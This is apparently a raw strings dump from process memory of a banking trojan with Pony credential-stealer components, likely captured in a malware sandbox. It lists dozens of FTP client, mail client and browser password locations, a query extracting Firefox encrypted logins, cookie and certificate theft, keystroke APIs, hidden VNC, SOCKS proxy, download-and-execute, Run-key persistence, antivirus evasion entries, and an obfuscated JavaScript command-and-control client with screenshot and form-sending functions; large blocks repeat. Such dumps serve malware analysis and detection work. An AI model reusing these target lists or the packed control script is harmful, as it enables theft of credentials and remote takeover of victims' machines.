\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
mozsqlite3.dll
sqlite3_open
sqlite3_close
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Password
HTTPMail Password
NNTP Password
IMAP Password
POP3 Password
SMTP Password2
HTTPMail Password2
NNTP Password2
IMAP Password2
POP3 Password2
IMAP Port
SMTP Port
POP3 Port
SMTP User
HTTPMail Server
HTTPMail User Name
HTTP Server URL
HTTP User
SMTP User Name
SMTP Server
SMTP Email Address
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
Chrome_WidgetWin_1
SysShadow
Chrome_WidgetWin_0
Dxtrans.dll
d3d11.dll
d3d9.dll
OPENGL32.dll
d2d1.dll
d3d10core.dll
d3d10.dll
d3d10_1core.dll
d3d10_1.dll
RegCloseKey
RegNotifyChangeKeyValue
ShellExecuteA
DeleteUrlCacheEntry
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
SHDeleteKeyA
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
FindCloseUrlCache
WinExec
KERNEL32.dll
MSVCRT.dll
IPHLPAPI.DLL
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
COMDLG32.dll
2)2.2;2~2
7 :(:1:7:
9.979`9}9
8-9G9Z9f9r9}9
%System%\imapi.exe
s.dat
iexplore.exe
firefox.exe
chrome.exe
\System32\kernel32.dll
\System32\kernelbase.dll
\ThemeApiPort

jqs.exe_1976_rwx_010B0000_0004E000:

%Documents and Settings%\All Users\Application Data\wzbrwgd.dat
.text
.rdata
@.data
.reloc
t.Ht Hu%
_^SSSh8
USER32.dll
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
More information: hXXp://VVV.ibsensoftware.com/
GDI32.dll
ole32.dll
OLEAUT32.dll
8CRYPT32.dll
NETAPI32.dll
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeadersA
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
kernel32.dll
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l W(i){j.T=i;j.w=s;j.U=1;j.R=l(){p(x M===\'I\'){M=l(){A{k C H("N.F.6.0")}B(e){}A{k C H("N.F.3.0")}B(e){}A{k C H("N.F")}B(e){}A{k C H("17.F")}B(e){}k u}}k C M()};j.o=l(a,b,c,d){J f=j.R();J g=s;J h=j;G=(x(d)==\'I\')?u:q;b=\'/\' j.T \'/\' Z.18() \'/\' b;p(G==q){j.w=s;f.X=l(){A{p(f.Q==4){p(f.O!=P||f.z==\'-\'){h.w=u;p(x(d)=="l"){d(u)}}E{p(f.z==\' \'){h.w=q;p(x(d)=="l"){d(q)}}E{h.w=f.z;p(x(d)=="l"){d(f.z)}}}}}B(e){h.w=u;p(x(d)=="l"){d(u)}}}}f.19(a,b,G);f.1c(c);p(G==q){k q}A{p(f.Q==4&&f.O==P){p(f.z==\'-\'){k u}E{p(f.z==\' \'){k q}E{k f.z}}}k u}B(e){k u}};j.1e=l(){k j.w};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'v\',m,b,c)};j.Y=l(a,b){m=\'2/\' a;k j.o(\'y\',m,s,b)};j.14=l(a,b){m=\'3/\' a;k j.o(\'y\',m,s,b)};j.15=l(a){m=\'4/\';k j.o(\'y\',m,s,a)};j.16=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'y\',\'5/\' t \'/\' a,s,c)};j.1a=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'5/\' t \'/\' a,c,d)};j.1b=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(x(c)==\'I\'||c==u){c=s;K=\'y\'}E{c=\'1d: \' c;K=\'v\'}k j.o(K,\'6/\' t \'/\' a,c,d)};j.L=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'7/\' t \'/\' a,c,d)};j.1f=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1g(a);k j.o(\'y\',m,s,d)};j.1h=l(a,b){m=\'9/\';k j.o(\'v\',m,a,b)};j.1i=l(a){m=\'10/\';k j.o(\'y\',m,s,a)};j.1j=l(a,b){m=\'11/\';k j.o(\'v\',m,a,b)};j.1k=l(a,b){m=\'12/\';k j.o(\'v\',m,a,b)};j.1l=l(a,b,c){m=\'13/\';L=a "\\r\\n" b;k j.o(\'v\',m,L,c)}};',62,84,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||false|POST|_LastAsync|typeof|GET|responseText|try|catch|new||else|XMLHTTP|Async|ActiveXObject|undefined|var|Type|Post|XMLHttpRequest|Msxml2|status|200|readyState|GetXHR||_Key|Version|SetVal|EQFramework|onreadystatechange|GetVal|Math|||||DelVal|ClearVals|GetServer|Microsoft|random|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm'.split('|'),0,{}));
CertificateAuthority
%s.pfx
cookies.sqlite
\Mozilla\Firefox\Profiles\
cookies.sqlite-journal
\Google\Chrome\User Data\Default\Cookies
chrome/Cookies
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
KERNEL32.DLL
chrome.dll
127.0.0.1
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsass.exe
lsm.exe
winlogon.exe
taskhost.exe
WININET.DLL
HttpEndRequestA
HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
#cert
[Pony] Fail Get Pass
DL_EXEC Status [Pipe]: %u-%u-%u
DL_EXEC Status[Local]: %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
login=%s&pass=%s
/viewforum.php?f=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=reply&f=%u&t=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=post&f=%u&sid=%0.8X%0.8X%0.8X%0.8X
explorer.exe
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
Common Files\Doctor Web
Doctor Web
McAfee.com
DrWeb
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Kernel32.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
<HTTPMail_Password2
<IMAP_Password2
<SMTP_Password2
<POP3_Password2
account.cfg
account.cfn
Dir #%u
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Last Server Port
Last Server Pass
Server.Port
Server.User
Server.Host
Server.Pass
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
mozsqlite3.dll
sqlite3_open
sqlite3_close
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Password
HTTPMail Password
NNTP Password
IMAP Password
POP3 Password
SMTP Password2
HTTPMail Password2
NNTP Password2
IMAP Password2
POP3 Password2
IMAP Port
SMTP Port
POP3 Port
SMTP User
HTTPMail Server
HTTPMail User Name
HTTP Server URL
HTTP User
SMTP User Name
SMTP Server
SMTP Email Address
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
Chrome_WidgetWin_1
SysShadow
Chrome_WidgetWin_0
Dxtrans.dll
d3d11.dll
d3d9.dll
OPENGL32.dll
d2d1.dll
d3d10core.dll
d3d10.dll
d3d10_1core.dll
d3d10_1.dll
RegCloseKey
RegNotifyChangeKeyValue
ShellExecuteA
DeleteUrlCacheEntry
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
SHDeleteKeyA
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
FindCloseUrlCache
WinExec
KERNEL32.dll
MSVCRT.dll
IPHLPAPI.DLL
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
COMDLG32.dll
2)2.2;2~2
7 :(:1:7:
9.979`9}9
8-9G9Z9f9r9}9
.pdata
@.reloc
CRYPT32.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
s.dat
iexplore.exe
firefox.exe
chrome.exe
\System32\kernel32.dll
\System32\kernelbase.dll
\ThemeApiPort

jqs.exe_1976_rwx_01140000_00078000:

.text
.rdata
@.data
.reloc
t.Ht Hu%
_^SSSh8
{7BD47FDD-1028-4944-A268-024C76A61BA9}
{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{4E153850-602D-4819-B83D-3CCD0A1E7351}
{1DB12055-380D-432E-9763-74AF5EF609C7}
{1DB54A51-7DD5-412D-BFAE-04066B1F7E58}
{6BDA2D4D-43CE-4CEF-B412-5DC94F387B59}
{11166F2F-6DE1-4205-8360-3AB2448931C2}
{7B4F16B2-1959-4C21-97FE-6A7768C974CF}
{433D2A25-41C1-4D21-8ED6-4EEC2CFE2DF1}
{77101F80-23B8-43A9-AE7B-5CC95982109D}
\\.\pipe\{615F04F4-5F33-42AB-BE17-250A447B0979}
D{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{56E926DB-5D71-499E-8BBB-2E28568040CB}
U{4E153850-602D-4819-B83D-3CCD0A1E7351}
2FFC7DAE-2BDA-4ABF-A443-1DD264C72327
USER32.dll
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
More information: hXXp://VVV.ibsensoftware.com/
GDI32.dll
ole32.dll
OLEAUT32.dll
8CRYPT32.dll
NETAPI32.dll
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeadersA
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
kernel32.dll
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l W(i){j.T=i;j.w=s;j.U=1;j.R=l(){p(x M===\'I\'){M=l(){A{k C H("N.F.6.0")}B(e){}A{k C H("N.F.3.0")}B(e){}A{k C H("N.F")}B(e){}A{k C H("17.F")}B(e){}k u}}k C M()};j.o=l(a,b,c,d){J f=j.R();J g=s;J h=j;G=(x(d)==\'I\')?u:q;b=\'/\' j.T \'/\' Z.18() \'/\' b;p(G==q){j.w=s;f.X=l(){A{p(f.Q==4){p(f.O!=P||f.z==\'-\'){h.w=u;p(x(d)=="l"){d(u)}}E{p(f.z==\' \'){h.w=q;p(x(d)=="l"){d(q)}}E{h.w=f.z;p(x(d)=="l"){d(f.z)}}}}}B(e){h.w=u;p(x(d)=="l"){d(u)}}}}f.19(a,b,G);f.1c(c);p(G==q){k q}A{p(f.Q==4&&f.O==P){p(f.z==\'-\'){k u}E{p(f.z==\' \'){k q}E{k f.z}}}k u}B(e){k u}};j.1e=l(){k j.w};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'v\',m,b,c)};j.Y=l(a,b){m=\'2/\' a;k j.o(\'y\',m,s,b)};j.14=l(a,b){m=\'3/\' a;k j.o(\'y\',m,s,b)};j.15=l(a){m=\'4/\';k j.o(\'y\',m,s,a)};j.16=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'y\',\'5/\' t \'/\' a,s,c)};j.1a=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'5/\' t \'/\' a,c,d)};j.1b=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(x(c)==\'I\'||c==u){c=s;K=\'y\'}E{c=\'1d: \' c;K=\'v\'}k j.o(K,\'6/\' t \'/\' a,c,d)};j.L=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'7/\' t \'/\' a,c,d)};j.1f=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1g(a);k j.o(\'y\',m,s,d)};j.1h=l(a,b){m=\'9/\';k j.o(\'v\',m,a,b)};j.1i=l(a){m=\'10/\';k j.o(\'y\',m,s,a)};j.1j=l(a,b){m=\'11/\';k j.o(\'v\',m,a,b)};j.1k=l(a,b){m=\'12/\';k j.o(\'v\',m,a,b)};j.1l=l(a,b,c){m=\'13/\';L=a "\\r\\n" b;k j.o(\'v\',m,L,c)}};',62,84,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||false|POST|_LastAsync|typeof|GET|responseText|try|catch|new||else|XMLHTTP|Async|ActiveXObject|undefined|var|Type|Post|XMLHttpRequest|Msxml2|status|200|readyState|GetXHR||_Key|Version|SetVal|EQFramework|onreadystatechange|GetVal|Math|||||DelVal|ClearVals|GetServer|Microsoft|random|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm'.split('|'),0,{}));
CertificateAuthority
%s.pfx
cookies.sqlite
\Mozilla\Firefox\Profiles\
cookies.sqlite-journal
\Google\Chrome\User Data\Default\Cookies
chrome/Cookies
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
KERNEL32.DLL
chrome.dll
127.0.0.1
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsass.exe
lsm.exe
winlogon.exe
taskhost.exe
WININET.DLL
HttpEndRequestA
HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
#cert
[Pony] Fail Get Pass
DL_EXEC Status [Pipe]: %u-%u-%u
DL_EXEC Status[Local]: %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
login=%s&pass=%s
/viewforum.php?f=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=reply&f=%u&t=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=post&f=%u&sid=%0.8X%0.8X%0.8X%0.8X
explorer.exe
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
Common Files\Doctor Web
Doctor Web
McAfee.com
DrWeb
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Kernel32.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
<HTTPMail_Password2
<IMAP_Password2
<SMTP_Password2
<POP3_Password2
account.cfg
account.cfn
Dir #%u
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Last Server Port
Last Server Pass
Server.Port
Server.User
Server.Host
Server.Pass
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
